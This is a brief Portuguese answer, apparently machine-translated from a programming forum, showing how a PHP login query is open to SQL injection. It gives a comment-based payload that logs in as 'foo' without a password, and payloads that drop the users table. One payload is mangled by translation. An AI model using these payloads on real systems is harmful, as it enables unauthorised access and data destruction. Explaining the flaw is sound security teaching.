Algo assim deve fazer:
- Para fazer login como usuário "foo", defina o nome de usuário como "foo' -- "
Isso fará com que sua consulta pareça
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
O "--" significa que o resto da linha está comentado
- Não tenho certeza se isso funcionará, mas tente definir o nome de usuário como "foo' OR (usuários de DROP TABLE) -- "
Isso fará com que sua consulta se pareça com:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
pode não aceitar isso - acho que as subconsultas só podem SELECT.
A função mysql_query executará apenas uma consulta - outras permitirão que você faça isso:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");
